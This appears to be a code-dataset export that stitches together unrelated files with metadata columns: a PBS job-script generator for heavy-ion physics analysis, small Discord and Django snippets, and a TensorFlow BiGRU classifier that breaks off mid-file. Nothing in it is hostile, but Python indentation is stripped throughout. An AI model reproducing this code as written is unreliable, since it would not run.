event_id = working_folder.split('/')[-1]
walltime = '30:00:00'
script = open(path.join(working_folder, "submit_job.pbs"), "w")
write_script_header(cluster_name, script, event_id, walltime,
working_folder)
script.write(
"""
mkdir HBT_results
for iev in `ls JAM_events | grep "particle_list"`
do
eventid=`echo $iev | rev | cut -f 1 -d _ | rev | cut -f 1 -d .`
cd hadronic_afterburner_toolkit
rm -fr results
mkdir results
mv ../JAM_events/$iev results/particle_list.dat
mv ../JAM_events/mixed_event_$eventid.dat results/particle_list_mixed_event.dat
./hadronic_afterburner_tools.e run_mode=1 read_in_mode=5 resonance_feed_down_flag=0 > output.log
mv results/particle_list.dat ../JAM_events/$iev
mv results/particle_list_mixed_event.dat ../JAM_events/mixed_event_$eventid.dat
mv results ../HBT_results/event_$eventid
cd ..
done
""")
script.close()
def generate_script_balance_function(cluster_name, folder_name):
working_folder = path.join(path.abspath('./'), folder_name)
event_id = working_folder.split('/')[-1]
walltime = '01:00:00'
particle_a_list = ['9998']
particle_b_list = ['-9998']
script = open(path.join(working_folder, "submit_job.pbs"), "w")
write_script_header(cluster_name, script, event_id, walltime,
working_folder)
script.write(
"""
mkdir BalanceFunction_results
for iev in `ls UrQMD_events | grep "particle_list"`
do
eventid=`echo $iev | rev | cut -f 1 -d _ | rev | cut -f 1 -d .`
cd hadronic_afterburner_toolkit
rm -fr results
mkdir results
mv ../UrQMD_events/$iev results/particle_list.dat
mv ../UrQMD_events/mixed_event_$eventid.dat results/particle_list_mixed_event.dat
""")
for ipart in range(len(particle_a_list)):
script.write(
"""
./hadronic_afterburner_tools.e read_in_mode=2 run_mode=3 resonance_feed_down_flag=0 distinguish_isospin=0 rap_type=0 rap_min=-1.0 rap_max=1.0 particle_alpha={0} particle_beta={1} BpT_min=0.2 BpT_max=3.0 > output.log
""".format(particle_a_list[ipart], particle_b_list[ipart]))
script.write(
"""
mv results/particle_list.dat ../UrQMD_events/$iev
mv results/particle_list_mixed_event.dat ../UrQMD_events/mixed_event_$eventid.dat
mv results ../BalanceFunction_results/event_$eventid
cd ..
done
""")
script.close()
def generate_script_spectra_and_vn(cluster_name, folder_name):
working_folder = path.join(path.abspath('./'), folder_name)
event_id = working_folder.split('/')[-1]
walltime = '1:00:00'
script = open(path.join(working_folder, "submit_job.pbs"), "w")
write_script_header(cluster_name, script, event_id, walltime,
working_folder)
script.write(
"""
mkdir spvn_results
for iev in `ls UrQMD_events | grep "particle_list"`
do
cd hadronic_afterburner_toolkit
rm -fr results
mkdir results
mv ../UrQMD_events/$iev results/particle_list.dat
""")
write_analysis_spectra_and_vn_commands(script, "UrQMD")
script.write(
"""
mv results/particle_list.dat ../UrQMD_events/$iev
mv results ../spvn_results/event_`echo $iev | rev | cut -f 1 -d _ | rev | cut -f 1 -d .`
cd ..
done
""")
script.close()
def generate_script_particle_yield_distribution(cluster_name, folder_name):
working_folder = path.join(path.abspath('./'), folder_name)
event_id = working_folder.split('/')[-1]
walltime = '1:00:00'
script = open(path.join(working_folder, "submit_job.pbs"), "w")
write_script_header(cluster_name, script, event_id, walltime,
working_folder)
script.write(
"""
mkdir spvn_results
for iev in `ls UrQMD_events | grep "particle_list"`
do
cd hadronic_afterburner_toolkit
rm -fr results
mkdir results
mv ../UrQMD_events/$iev results/particle_list.dat
""")
write_analysis_particle_distrubtion_commands(script, "UrQMD")
script.write(
"""
mv results/particle_list.dat ../UrQMD_events/$iev
mv results ../spvn_results/event_`echo $iev | rev | cut -f 1 -d _ | rev | cut -f 1 -d .`
cd ..
done
""")
script.close()
def generate_script_particle_yield_distribution_with_OSCAR(cluster_name,
folder_name):
working_folder = path.join(path.abspath('./'), folder_name)
event_id = working_folder.split('/')[-1]
walltime = '1:00:00'
script = open(path.join(working_folder, "submit_job.pbs"), "w")
write_script_header(cluster_name, script, event_id, walltime,
working_folder)
script.write(
"""
mkdir spvn_results
for iev in `ls OSCAR_events`
do
cd hadronic_afterburner_toolkit
rm -fr results
mkdir results
mv ../OSCAR_events/$iev results/OSCAR.DAT
""")
write_analysis_particle_distrubtion_commands(script, "OSCAR")
script.write(
"""
mv results/OSCAR.DAT ../OSCAR_events/$iev
mv results ../spvn_results/event_`echo $iev | cut -f 2 -d _ | cut -f 1 -d .`
cd ..
done
""")
script.close()
def generate_script_spectra_and_vn_with_JAM(cluster_name, folder_name):
working_folder = path.join(path.abspath('./'), folder_name)
event_id = working_folder.split('/')[-1]
walltime = '3:00:00'
script = open(path.join(working_folder, "submit_job.pbs"), "w")
write_script_header(cluster_name, script, event_id, walltime,
working_folder)
script.write(
"""
mkdir spvn_results
for iev in `ls JAM_events | grep "particle_list"`
do
cd hadronic_afterburner_toolkit
rm -fr results
mkdir results
mv ../JAM_events/$iev results/particle_list.dat
""")
write_analysis_spectra_and_vn_commands(script, "JAM")
script.write(
"""
mv results/particle_list.dat ../JAM_events/$iev
mv results ../spvn_results/event_`echo $iev | rev | cut -f 1 -d _ | rev | cut -f 1 -d .`
cd ..
done
""")
script.close()
def generate_script_HBT_with_OSCAR(cluster_name, folder_name):
working_folder = path.join(path.abspath('./'), folder_name)
event_id = working_folder.split('/')[-1]
walltime = '35:00:00'
script = open(path.join(working_folder, "submit_job.pbs"), "w")
write_script_header(cluster_name, script, event_id, walltime,
working_folder)
script.write(
"""
mkdir HBT_results
for iev in `ls OSCAR_events | grep "OSCAR"`
do
eventid=`echo $iev | cut -f 2 -d _ | cut -f 1 -d .`
cd hadronic_afterburner_toolkit
rm -fr results
mkdir results
mv ../OSCAR_events/$iev results/OSCAR.DAT
mv ../OSCAR_events/mixed_event_$eventid.dat results/OSCAR_mixed_event.DAT
./hadronic_afterburner_tools.e read_in_mode=0 run_mode=1 resonance_feed_down_flag=1 > output.log
mv results/OSCAR.DAT ../OSCAR_events/$iev
mv results/OSCAR_mixed_event.DAT ../OSCAR_events/mixed_event_$eventid.dat
mv results ../HBT_results/event_$eventid
cd ..
done
""")
script.close()
def copy_UrQMD_events(number_of_cores, input_folder, working_folder):
events_list = glob('%s/particle_list_*.dat' % input_folder)
if events_list == []:
events_list = glob('%s/particle_list_*.gz' % input_folder)
if events_list == []:
print("Error: can not find UrQMD events, events_list is empty! ",
events_list)
else:
print("Linking zipped binary UrQMD events, ",
"make sure read_in_mode is set to 2~")
for iev in range(len(events_list)):
folder_id = iev % number_of_cores
filename = events_list[iev].split('/')[-1].split('.')[0]
event_id = filename.split('_')[-1]
folder_path = path.join(working_folder, 'event_%d' % folder_id,
'UrQMD_events', '%s.dat' % filename)
bashCommand = "ln -s %s %s" % (
path.abspath(events_list[iev]), folder_path)
subprocess.Popen(bashCommand, stdout = subprocess.PIPE, shell=True)
mixed_id = random.randint(0, len(events_list)-1)
filename_mixed = events_list[mixed_id].split('/')[-1].split('.')[0]
mixed_event_id = filename_mixed.split('_')[-1]
while (mixed_event_id == iev):
mixed_id = random.randint(0, len(events_list)-1)
filename_mixed = events_list[mixed_id].split('/')[-1].split('.')[0]
mixed_event_id = filename_mixed.split('_')[-1]
folder_path = path.join(
working_folder, 'event_%d' % folder_id,
'UrQMD_events', 'mixed_event_%s.dat' % event_id)
bashCommand = "ln -s %s %s" % (
path.abspath(events_list[mixed_id]), folder_path)
subprocess.Popen(bashCommand, stdout = subprocess.PIPE, shell=True)
def copy_JAM_events(number_of_cores, input_folder, working_folder):
events_list = glob('%s/particle_list_*.dat' % input_folder)
for iev in range(len(events_list)):
folder_id = iev % number_of_cores
filename = events_list[iev].split('/')[-1].split('.')[0]
event_id = filename.split('_')[-1]
folder_path = path.join(working_folder, 'event_%d' % folder_id,
'JAM_events', '%s.dat' % filename)
bashCommand = "ln -s %s %s" % (
path.abspath(events_list[iev]), folder_path)
subprocess.Popen(bashCommand, stdout = subprocess.PIPE, shell=True)
mixed_id = random.randint(0, len(events_list)-1)
filename_mixed = events_list[mixed_id].split('/')[-1].split('.')[0]
mixed_event_id = filename_mixed.split('_')[-1]
while (mixed_event_id == iev):
mixed_id = random.randint(0, len(events_list)-1)
filename_mixed = events_list[mixed_id].split('/')[-1].split('.')[0]
mixed_event_id = filename_mixed.split('_')[-1]
folder_path = path.join(working_folder, 'event_%d' % folder_id,
'JAM_events', 'mixed_event_%s.dat' % event_id)
bashCommand = "ln -s %s %s" % (path.abspath(events_list[mixed_id]),
folder_path)
subprocess.Popen(bashCommand, stdout = subprocess.PIPE, shell=True)
def generate_event_folder_UrQMD(cluster_name, working_folder, event_id, mode):
event_folder = path.join(working_folder, 'event_%d' % event_id)
mkdir(event_folder)
if mode == 2:
# calculate HBT correlation with OSCAR outputs
mkdir(path.join(event_folder, 'OSCAR_events'))
generate_script_HBT_with_OSCAR(cluster_name, event_folder)
elif mode == 3:
# calculate HBT correlation with UrQMD outputs
mkdir(path.join(event_folder, 'UrQMD_events'))
generate_script_HBT(cluster_name, event_folder)
elif mode == 4:
# calculate HBT correlation with UrQMD outputs
mkdir(path.join(event_folder, 'UrQMD_events'))
generate_script_spectra_and_vn(cluster_name, event_folder)
elif mode == 8:
# collect event-by-event particle distribution
mkdir(path.join(event_folder, 'UrQMD_events'))
generate_script_particle_yield_distribution(cluster_name, event_folder)
elif mode == 9:
# calculate event-by-event particle distribution with OSCAR outputs
mkdir(path.join(event_folder, 'OSCAR_events'))
generate_script_particle_yield_distribution_with_OSCAR(cluster_name,
event_folder)
elif mode == 10:
# calculate balance function correlation with UrQMD outputs
mkdir(path.join(event_folder, 'UrQMD_events'))
generate_script_balance_function(cluster_name, event_folder)
shutil.copytree('codes/hadronic_afterburner_toolkit',
path.join(path.abspath(event_folder),
'hadronic_afterburner_toolkit'))
subprocess.call("ln -s {0:s} {1:s}".format(
path.abspath(path.join('codes', 'hadronic_afterburner_toolkit_code',
'hadronic_afterburner_tools.e')),
path.join(path.abspath(event_folder), "hadronic_afterburner_toolkit",
"hadronic_afterburner_tools.e")), shell=True)
subprocess.call("ln -s {0:s} {1:s}".format(
path.abspath('codes/hadronic_afterburner_toolkit_code/EOS'),
path.join(path.abspath(event_folder),
"hadronic_afterburner_toolkit/EOS")), shell=True)
def generate_event_folder_JAM(cluster_name, working_folder, event_id, mode):
event_folder = path.join(working_folder, 'event_%d' % event_id)
mkdir(event_folder)
if mode == 5:
# run JAM with OSCAR files
mkdir(path.join(event_folder, 'OSCAR_events'))
generate_script_JAM(cluster_name, event_folder)
shutil.copytree('codes/JAM',
path.join(path.abspath(event_folder), 'JAM'))
elif mode == 6:
# collect particle spectra and vn with JAM outputs
mkdir(path.join(event_folder, 'JAM_events'))
generate_script_spectra_and_vn_with_JAM(cluster_name, event_folder)
shutil.copytree('codes/hadronic_afterburner_toolkit',
path.join(path.abspath(event_folder),
'hadronic_afterburner_toolkit'))
elif mode == 7:
# calculate HBT correlation with JAM outputs
mkdir(path.join(event_folder, 'JAM_events'))
generate_script_HBT_with_JAM(cluster_name, event_folder)
shutil.copytree('codes/hadronic_afterburner_toolkit',
path.join(path.abspath(event_folder),
'hadronic_afterburner_toolkit'))
def generate_event_folder(cluster_name, working_folder, event_id):
event_folder = path.join(working_folder, 'event_%d' % event_id)
mkdir(event_folder)
mkdir(path.join(event_folder, 'OSCAR_events'))
generate_script(cluster_name, event_folder)
shutil.copytree('codes/osc2u',
path.join(path.abspath(event_folder), 'osc2u'))
shutil.copytree('codes/urqmd',
path.join(path.abspath(event_folder), 'urqmd'))
subprocess.call("ln -s {0:s} {1:s}".format(
path.abspath('codes/urqmd_code/urqmd/urqmd.e'),
path.join(path.abspath(event_folder), "urqmd/urqmd.e")), shell=True)
def copy_OSCAR_events(number_of_cores, input_folder, working_folder):
events_list = glob('%s/*.dat' % input_folder)
for iev in range(len(events_list)):
folder_id = iev % number_of_cores
filename = events_list[iev].split('/')[-1].split('.')[0]
event_id = filename.split('_')[-1]
folder_path = path.join(
working_folder, 'event_%d' % folder_id,
'OSCAR_events', events_list[iev].split('/')[-1])
bashCommand = "ln -s %s %s" % (
path.abspath(events_list[iev]), folder_path)
subprocess.Popen(bashCommand, stdout = subprocess.PIPE, shell=True)
mixed_id = random.randint(0, len(events_list)-1)
filename_mixed = events_list[mixed_id].split('/')[-1].split('.')[0]
mixed_event_id = filename_mixed.split('_')[-1]
while (mixed_event_id == iev):
mixed_id = random.randint(0, len(events_list)-1)
filename_mixed = events_list[mixed_id].split('/')[-1].split('.')[0]
mixed_event_id = filename_mixed.split('_')[-1]
folder_path = path.join(
working_folder, 'event_%d' % folder_id,
'OSCAR_events', 'mixed_event_%s.dat' % event_id)
bashCommand = "ln -s %s %s" % (
path.abspath(events_list[mixed_id]), folder_path)
subprocess.Popen(bashCommand, stdout = subprocess.PIPE, shell=True)
def generate_event_folder_iSS(cluster_name, working_folder, event_id):
event_folder = path.join(working_folder, 'event_%d' % event_id)
mkdir(event_folder)
mkdir(path.join(event_folder, 'hydro_events'))
generate_script_iSS(cluster_name, event_folder)
shutil.copytree('codes/iSS',
path.join(path.abspath(event_folder), 'iSS'))
subprocess.call("ln -s {0:s} {1:s}".format(
path.abspath('codes/iSS_code/iSS_tables'),
path.join(path.abspath(event_folder), "iSS/iSS_tables")), shell=True)
subprocess.call("ln -s {0:s} {1:s}".format(
path.abspath('codes/iSS_code/iSS.e'),
path.join(path.abspath(event_folder), "iSS/iSS.e")), shell=True)
shutil.copytree('codes/osc2u',
path.join(path.abspath(event_folder), 'osc2u'))
shutil.copytree('codes/urqmd',
path.join(path.abspath(event_folder), 'urqmd'))
subprocess.call("ln -s {0:s} {1:s}".format(
path.abspath('codes/urqmd_code/urqmd/urqmd.e'),
path.join(path.abspath(event_folder), "urqmd/urqmd.e")), shell=True)
shutil.copytree('codes/hadronic_afterburner_toolkit',
path.join(path.abspath(event_folder),
'hadronic_afterburner_toolkit'))
subprocess.call("ln -s {0:s} {1:s}".format(
path.abspath('codes/hadronic_afterburner_toolkit_code/EOS'),
path.join(path.abspath(event_folder),
"hadronic_afterburner_toolkit/EOS")), shell=True)
def generate_event_folder_iS(cluster_name, working_folder, event_id):
event_folder = path.join(working_folder, 'event_%d' % event_id)
mkdir(event_folder)
mkdir(path.join(event_folder, 'hydro_events'))
generate_script_iS(cluster_name, event_folder)
shutil.copytree('codes/iS',
path.join(path.abspath(event_folder), 'iS'))
def copy_hydro_events(number_of_cores, input_folder, working_folder):
events_list = glob('%s/surface*.dat' % input_folder)
for iev in range(len(events_list)):
event_id = events_list[iev].split('/')[-1].split('_')[-1].split('.')[0]
folder_id = iev % number_of_cores
working_path = path.join(working_folder, 'event_%d' % folder_id,
'hydro_events')
folder_path = path.join(working_path, events_list[iev].split('/')[-1])
bashCommand = "ln -s %s %s" % (
path.abspath(events_list[iev]), folder_path)
subprocess.Popen(bashCommand, stdout = subprocess.PIPE, shell=True)
shutil.copy(path.join(input_folder,
'music_input_event_%s' % event_id),
working_path)
def copy_job_scripts(working_folder):
shutil.copy("job_MPI_wrapper.py", working_folder)
shutil.copy("submit_MPI_job_for_all.pbs", working_folder)
shutil.copy("run_job.sh", working_folder)
def print_mode_cheat_sheet():
print("Here is a cheat sheet for mode option:")
print("mode -1: run iS + resonance decay")
print("mode 0: run iSS + osc2u + UrQMD from hydro hypersurface")
print("mode 1: run UrQMD with OSCAR events")
print("mode 2: calculate HBT correlation with OSCAR events")
print("mode 3: calculate HBT correlation with UrQMD events")
print("mode 4: collect spectra and flow observables from UrQMD events")
print("mode 5: run JAM with OSCAR events")
print("mode 6: collect spectra and vn with JAM events")
print("mode 7: calculate HBT correlation with JAM events")
print("mode 8: collect particle yield distribution with UrQMD events")
print("mode 9: collect particle yield distribution with OSCAR events")
if __name__ == "__main__":
try:
from_folder = str(sys.argv[1])
folder_name = str(sys.argv[2])
cluster_name = str(sys.argv[3])
ncore = int(sys.argv[4])
mode = int(sys.argv[5])
except IndexError:
print("Usage:")
print(" %s input_folder working_folder cluster_name num_of_cores mode"
% str(sys.argv[0]))
print("")
print_mode_cheat_sheet()
exit(0)
if mode == 0: # run iSS + osc2u + UrQMD from hydro hypersurface
for icore in range(ncore):
generate_event_folder_iSS(cluster_name, folder_name, icore)
copy_hydro_events(ncore, from_folder, folder_name)
copy_job_scripts(folder_name)
elif mode == -1: # run iS + resonance decay
for icore in range(ncore):
generate_event_folder_iS(cluster_name, folder_name, icore)
copy_hydro_events(ncore, from_folder, folder_name)
elif mode == 1: # run UrQMD with OSCAR events
for icore in range(ncore):
generate_event_folder(cluster_name, folder_name, icore)
copy_OSCAR_events(ncore, from_folder, folder_name)
elif mode == 2: # calculate HBT correlation with OSCAR events
for icore in range(ncore):
generate_event_folder_UrQMD(cluster_name, folder_name, icore, mode)
copy_OSCAR_events(ncore, from_folder, folder_name)
elif mode == 3: # calculate HBT correlation with UrQMD events
for icore in range(ncore):
generate_event_folder_UrQMD(cluster_name, folder_name, icore, mode)
copy_UrQMD_events(ncore, from_folder, folder_name)
copy_job_scripts(folder_name)
elif mode == 4: # collect spectra and flow observables from UrQMD events
for icore in range(ncore):
generate_event_folder_UrQMD(cluster_name, folder_name, icore, mode)
copy_UrQMD_events(ncore, from_folder, folder_name)
copy_job_scripts(folder_name)
elif mode == 5: # run JAM with OSCAR events
for icore in range(ncore):
generate_event_folder_JAM(cluster_name, folder_name, icore, mode)
copy_OSCAR_events(ncore, from_folder, folder_name)
elif mode == 6: # collect spectra and vn with JAM events
for icore in range(ncore):
generate_event_folder_JAM(cluster_name, folder_name, icore, mode)
copy_JAM_events(ncore, from_folder, folder_name)
elif mode == 7: # calculate HBT correlation with JAM events
for icore in range(ncore):
generate_event_folder_JAM(cluster_name, folder_name, icore, mode)
copy_JAM_events(ncore, from_folder, folder_name)
elif mode == 8: # collect particle yield distribution with UrQMD events
for icore in range(ncore):
generate_event_folder_UrQMD(cluster_name, folder_name, icore, mode)
copy_UrQMD_events(ncore, from_folder, folder_name)
elif mode == 9: # collect particle yield distribution with OSCAR events
for icore in range(ncore):
generate_event_folder_UrQMD(cluster_name, folder_name, icore, mode)
copy_OSCAR_events(ncore, from_folder, folder_name)
elif mode == 10: # calculate balance function correlation with UrQMD events
for icore in range(ncore):
generate_event_folder_UrQMD(cluster_name, folder_name, icore, mode)
copy_UrQMD_events(ncore, from_folder, folder_name)
copy_job_scripts(folder_name)
| 42.130221
| 253
| 0.666297
| 4,723
| 34,294
| 4.550498
| 0.057379
| 0.046575
| 0.01675
| 0.026522
| 0.899497
| 0.886516
| 0.863949
| 0.836404
| 0.804485
| 0.758561
| 0
| 0.019421
| 0.210241
| 34,294
| 813
| 254
| 42.182042
| 0.77411
| 0.02948
| 0
| 0.661795
| 0
| 0
| 0.127327
| 0.030412
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05428
| false
| 0
| 0.012526
| 0
| 0.066806
| 0.043841
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
8ba2e373bcb013631bced573d39f363772bcfa6a
| 233
|
py
|
Python
|
config/globals.py
|
pw963/WVS
|
ab012f2f427d593ebf442f67d1b8be009db25fa0
|
[
"MIT"
] | null | null | null |
config/globals.py
|
pw963/WVS
|
ab012f2f427d593ebf442f67d1b8be009db25fa0
|
[
"MIT"
] | null | null | null |
config/globals.py
|
pw963/WVS
|
ab012f2f427d593ebf442f67d1b8be009db25fa0
|
[
"MIT"
] | null | null | null |
extensions = [
"cogs.help",
"cogs.game_punishments.ban",
"cogs.game_punishments.kick",
"cogs.game_punishments.unban",
"cogs.game_punishments.warn",
"cogs.settings.setchannel",
"cogs.verification.verify"
]
| 23.3
| 34
| 0.678112
| 25
| 233
| 6.16
| 0.52
| 0.207792
| 0.493506
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.167382
| 233
| 9
| 35
| 25.888889
| 0.793814
| 0
| 0
| 0
| 0
| 0
| 0.690987
| 0.652361
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
8bcbe52d00899351636051088de27ac0604b7da6
| 188
|
py
|
Python
|
app/core/admin.py
|
jingr1986/Paranuara-Challenge
|
4c1bb619a79df9a7405f8b7fd29911b011a0d590
|
[
"MIT"
] | null | null | null |
app/core/admin.py
|
jingr1986/Paranuara-Challenge
|
4c1bb619a79df9a7405f8b7fd29911b011a0d590
|
[
"MIT"
] | null | null | null |
app/core/admin.py
|
jingr1986/Paranuara-Challenge
|
4c1bb619a79df9a7405f8b7fd29911b011a0d590
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import Company, People, Tag, Food
admin.site.register(Company)
admin.site.register(People)
admin.site.register(Tag)
admin.site.register(Food)
| 26.857143
| 46
| 0.808511
| 28
| 188
| 5.428571
| 0.428571
| 0.236842
| 0.447368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.079787
| 188
| 7
| 47
| 26.857143
| 0.878613
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
8bd0c2139fe78dc1b75f8c575d63e8b12416b8f0
| 29
|
py
|
Python
|
mobula/operators/Layer.py
|
wkcn/mobula
|
4eec938d6477776f5f2d68bcf41de83fb8da5195
|
[
"MIT"
] | 47
|
2017-07-15T02:13:18.000Z
|
2022-01-01T09:37:59.000Z
|
mobula/operators/Layer.py
|
wkcn/mobula
|
4eec938d6477776f5f2d68bcf41de83fb8da5195
|
[
"MIT"
] | 3
|
2018-06-22T13:55:12.000Z
|
2020-01-29T01:41:13.000Z
|
mobula/operators/Layer.py
|
wkcn/mobula
|
4eec938d6477776f5f2d68bcf41de83fb8da5195
|
[
"MIT"
] | 8
|
2017-09-03T12:42:54.000Z
|
2020-09-27T03:38:59.000Z
|
from ..layers.Layer import *
| 14.5
| 28
| 0.724138
| 4
| 29
| 5.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.137931
| 29
| 1
| 29
| 29
| 0.84
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
479227225dc0f0d08f09761988430170ea59f17a
| 92
|
py
|
Python
|
pytest/src/operations/AddOperation.py
|
ronaldfalcao/python-codes
|
70fec6836844c70c3678425cd84cf50fd6897d45
|
[
"MIT"
] | null | null | null |
pytest/src/operations/AddOperation.py
|
ronaldfalcao/python-codes
|
70fec6836844c70c3678425cd84cf50fd6897d45
|
[
"MIT"
] | null | null | null |
pytest/src/operations/AddOperation.py
|
ronaldfalcao/python-codes
|
70fec6836844c70c3678425cd84cf50fd6897d45
|
[
"MIT"
] | null | null | null |
class AddOperation:
def soma(self, number1, number2):
return number1 + number2
| 18.4
| 37
| 0.673913
| 10
| 92
| 6.2
| 0.8
| 0.451613
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.057971
| 0.25
| 92
| 4
| 38
| 23
| 0.84058
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
47f4d10565ede80ecf038a7a5188e1ade5f6d850
| 56,819
|
py
|
Python
|
1 Bi-GRU/BiGRU_model.py
|
acadTags/Automated-Social-Annotation
|
a988f7b11998accb9357dc920b90760f537edfee
|
[
"MIT"
] | 12
|
2018-12-09T07:45:12.000Z
|
2021-09-22T09:18:11.000Z
|
1 Bi-GRU/BiGRU_model.py
|
acadTags/Automated-Social-Annotation
|
a988f7b11998accb9357dc920b90760f537edfee
|
[
"MIT"
] | null | null | null |
1 Bi-GRU/BiGRU_model.py
|
acadTags/Automated-Social-Annotation
|
a988f7b11998accb9357dc920b90760f537edfee
|
[
"MIT"
] | 4
|
2020-03-19T19:11:20.000Z
|
2021-11-27T11:26:19.000Z
|
# -*- coding: utf-8 -*-
import tensorflow as tf
from tensorflow.contrib import rnn
import numpy as np
class BiGRU:
def __init__(self,num_classes, learning_rate, batch_size, decay_steps, decay_rate,sequence_length,
vocab_size,embed_size,is_training,lambda_sim=0.00001,lambda_sub=0,dynamic_sem=False,dynamic_sem_l2=False,initializer=tf.random_normal_initializer(stddev=0.1),clip_gradients=5.0,multi_label_flag=True): #initializer=tf.random_normal_initializer(stddev=0.1)
"""init all hyperparameter here"""
# set hyperparamter
self.num_sentences = 1
self.num_classes = num_classes
self.batch_size = batch_size
self.sequence_length=sequence_length
self.vocab_size=vocab_size
self.embed_size=embed_size
self.hidden_size=embed_size
self.is_training=is_training
self.learning_rate = tf.Variable(learning_rate, trainable=False, name="learning_rate")
self.learning_rate_decay_half_op = tf.assign(self.learning_rate, self.learning_rate * 0.5) # using assign to half the learning_rate
self.initializer=initializer
self.multi_label_flag = multi_label_flag
self.clip_gradients=clip_gradients
self.lambda_sim=lambda_sim
self.lambda_sub=lambda_sub
self.dynamic_sem = dynamic_sem
self.dynamic_sem_l2 = dynamic_sem_l2
# add placeholder (X,label)
self.input_x = tf.placeholder(tf.int32, [None, self.sequence_length], name="input_x") # X
self.input_y = tf.placeholder(tf.int32,[None], name="input_y") # for single label # y [None,num_classes]
self.input_y_multilabel = tf.placeholder(tf.float32, [None, self.num_classes],name="input_y_multilabel") # y:[None,num_classes]. this is for multi-label classification only.
self.dropout_keep_prob=tf.placeholder(tf.float32,name="dropout_keep_prob")
#self.label_sim_matrix = tf.placeholder(tf.float32, [self.num_classes,self.num_classes],name="label_sim_mat")
#self.label_sub_matrix = tf.placeholder(tf.float32, [self.num_classes,self.num_classes],name="label_sub_mat")
self.label_sim_matrix_static = tf.placeholder(tf.float32, [self.num_classes,self.num_classes],name="label_sim_mat_const")
self.label_sub_matrix_static = tf.placeholder(tf.float32, [self.num_classes,self.num_classes],name="label_sub_mat_const")
if self.dynamic_sem == False:
self.label_sim_matrix = self.label_sim_matrix_static
self.label_sub_matrix = self.label_sub_matrix_static
print('self.dynamic_sem:',self.dynamic_sem)
self.global_step = tf.Variable(0, trainable=False, name="Global_Step")
self.epoch_step=tf.Variable(0,trainable=False,name="Epoch_Step")
self.epoch_increment=tf.assign(self.epoch_step,tf.add(self.epoch_step,tf.constant(1)))
self.decay_steps, self.decay_rate = decay_steps, decay_rate
self.instantiate_weights()
print('self.label_sim_matrix:',self.label_sim_matrix)
print('self.label_sub_matrix:',self.label_sub_matrix)
print('display trainable variables')
for v in tf.trainable_variables():
print(v)
self.logits = self.inference() #[None, self.label_size]. main computation graph is here.
if not is_training:
return
if multi_label_flag:
print("going to use multi label loss.")
if self.lambda_sim == 0:
if self.lambda_sub == 0:
# none
self.loss_val = self.loss_multilabel() # without any semantic regularisers, no L_sim or L_sub
else:
# using L_sub only
#self.loss_val = self.loss_multilabel_onto_new_sub_per_batch(self.label_sub_matrix); # j,k per batch - used in the NAACL paper
self.loss_val = self.loss_multilabel_onto_new_sub_per_doc(self.label_sub_matrix,dynamic_sem_l2=self.dynamic_sem_l2); # j,k per document
else:
if self.lambda_sub == 0:
# using L_sim only
#pair_diff_squared on s_d
#self.loss_val = self.loss_multilabel_onto_new_sim_per_batch(self.label_sim_matrix) # j,k per batch - used in the NAACL paper
#self.loss_val = self.loss_multilabel_onto_new_sim_per_doc_tensor(self.label_sim_matrix) # j,k per document - tensor operations - requiring large GPU memory
#self.loss_val = self.loss_multilabel_onto_new_sim_per_doc_not_used(self.label_sim_matrix) # j,k per document - with for loop - requiring large GPU memory
self.loss_val = self.loss_multilabel_onto_new_sim_per_doc(self.label_sim_matrix,dynamic_sem_l2=self.dynamic_sem_l2) # j,k per document - with for loop
#pair_diff_abs on rounded s_d
#self.loss_val = self.loss_multilabel_onto_new_sim_pair_diff_abs(self.label_sim_matrix) # j,k per document - new sim pair_diff_abs
else:
# sim+sub
#self.loss_val = self.loss_multilabel_onto_new_simsub_per_batch(self.label_sim_matrix,self.label_sub_matrix) # j,k per batch - used in the NAACL paper
self.loss_val = self.loss_multilabel_onto_new_simsub_per_doc(self.label_sim_matrix,self.label_sub_matrix,dynamic_sem_l2=self.dynamic_sem_l2) # j,k per document
